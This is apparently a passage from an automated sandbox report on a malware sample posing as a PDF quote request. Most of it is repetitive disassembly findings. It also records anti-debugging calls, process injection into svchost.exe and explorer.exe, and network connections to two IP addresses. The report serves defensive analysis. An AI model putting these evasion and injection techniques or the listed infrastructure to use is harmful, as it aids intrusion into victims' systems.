          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B106E mov eax, dword ptr fs:[00000030h]2_2_032B106E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305060 mov eax, dword ptr fs:[00000030h]2_2_03305060
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov ecx, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD070 mov ecx, dword ptr fs:[00000030h]2_2_032AD070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D705E mov ebx, dword ptr fs:[00000030h]2_2_032D705E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D705E mov eax, dword ptr fs:[00000030h]2_2_032D705E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B052 mov eax, dword ptr fs:[00000030h]2_2_0325B052
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BD080 mov eax, dword ptr fs:[00000030h]2_2_032BD080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BD080 mov eax, dword ptr fs:[00000030h]2_2_032BD080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D08D mov eax, dword ptr fs:[00000030h]2_2_0322D08D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235096 mov eax, dword ptr fs:[00000030h]2_2_03235096
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D090 mov eax, dword ptr fs:[00000030h]2_2_0325D090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D090 mov eax, dword ptr fs:[00000030h]2_2_0325D090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326909C mov eax, dword ptr fs:[00000030h]2_2_0326909C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032550E4 mov eax, dword ptr fs:[00000030h]2_2_032550E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032550E4 mov ecx, dword ptr fs:[00000030h]2_2_032550E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033050D9 mov eax, dword ptr fs:[00000030h]2_2_033050D9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD0C0 mov eax, dword ptr fs:[00000030h]2_2_032AD0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD0C0 mov eax, dword ptr fs:[00000030h]2_2_032AD0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032590DB mov eax, dword ptr fs:[00000030h]2_2_032590DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF72E mov eax, dword ptr fs:[00000030h]2_2_032EF72E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03233720 mov eax, dword ptr fs:[00000030h]2_2_03233720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F720 mov eax, dword ptr fs:[00000030h]2_2_0324F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F720 mov eax, dword ptr fs:[00000030h]2_2_0324F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F720 mov eax, dword ptr fs:[00000030h]2_2_0324F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F972B mov eax, dword ptr fs:[00000030h]2_2_032F972B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229730 mov eax, dword ptr fs:[00000030h]2_2_03229730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229730 mov eax, dword ptr fs:[00000030h]2_2_03229730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03265734 mov eax, dword ptr fs:[00000030h]2_2_03265734
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323973A mov eax, dword ptr fs:[00000030h]2_2_0323973A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323973A mov eax, dword ptr fs:[00000030h]2_2_0323973A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237703 mov eax, dword ptr fs:[00000030h]2_2_03237703
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235702 mov eax, dword ptr fs:[00000030h]2_2_03235702
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235702 mov eax, dword ptr fs:[00000030h]2_2_03235702
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F71F mov eax, dword ptr fs:[00000030h]2_2_0326F71F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F71F mov eax, dword ptr fs:[00000030h]2_2_0326F71F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243740 mov eax, dword ptr fs:[00000030h]2_2_03243740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243740 mov eax, dword ptr fs:[00000030h]2_2_03243740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243740 mov eax, dword ptr fs:[00000030h]2_2_03243740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303749 mov eax, dword ptr fs:[00000030h]2_2_03303749
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B97A9 mov eax, dword ptr fs:[00000030h]2_2_032B97A9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BF7AF mov eax, dword ptr fs:[00000030h]2_2_032BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BF7AF mov eax, dword ptr fs:[00000030h]2_2_032BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BF7AF mov eax, dword ptr fs:[00000030h]2_2_032BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BF7AF mov eax, dword ptr fs:[00000030h]2_2_032BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BF7AF mov eax, dword ptr fs:[00000030h]2_2_032BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033037B6 mov eax, dword ptr fs:[00000030h]2_2_033037B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D7B0 mov eax, dword ptr fs:[00000030h]2_2_0325D7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F7BA mov eax, dword ptr fs:[00000030h]2_2_0322F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF78A mov eax, dword ptr fs:[00000030h]2_2_032EF78A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323D7E0 mov ecx, dword ptr fs:[00000030h]2_2_0323D7E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032357C0 mov eax, dword ptr fs:[00000030h]2_2_032357C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032357C0 mov eax, dword ptr fs:[00000030h]2_2_032357C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032357C0 mov eax, dword ptr fs:[00000030h]2_2_032357C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F626 mov eax, dword ptr fs:[00000030h]2_2_0322F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305636 mov eax, dword ptr fs:[00000030h]2_2_03305636
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03261607 mov eax, dword ptr fs:[00000030h]2_2_03261607
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F603 mov eax, dword ptr fs:[00000030h]2_2_0326F603
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03233616 mov eax, dword ptr fs:[00000030h]2_2_03233616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03233616 mov eax, dword ptr fs:[00000030h]2_2_03233616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03269660 mov eax, dword ptr fs:[00000030h]2_2_03269660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03269660 mov eax, dword ptr fs:[00000030h]2_2_03269660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D6AA mov eax, dword ptr fs:[00000030h]2_2_0322D6AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D6AA mov eax, dword ptr fs:[00000030h]2_2_0322D6AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032276B2 mov eax, dword ptr fs:[00000030h]2_2_032276B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032276B2 mov eax, dword ptr fs:[00000030h]2_2_032276B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032276B2 mov eax, dword ptr fs:[00000030h]2_2_032276B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B368C mov eax, dword ptr fs:[00000030h]2_2_032B368C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B368C mov eax, dword ptr fs:[00000030h]2_2_032B368C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B368C mov eax, dword ptr fs:[00000030h]2_2_032B368C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B368C mov eax, dword ptr fs:[00000030h]2_2_032B368C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C36EE mov eax, dword ptr fs:[00000030h]2_2_032C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C36EE mov eax, dword ptr fs:[00000030h]2_2_032C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C36EE mov eax, dword ptr fs:[00000030h]2_2_032C36EE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00AA0B62
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A72622
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A6083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A6083F
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A609D5 SetUnhandledExceptionFilter,0_2_00A609D5
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A60C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A60C21

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 164.92.166.75 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.104.236.215 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
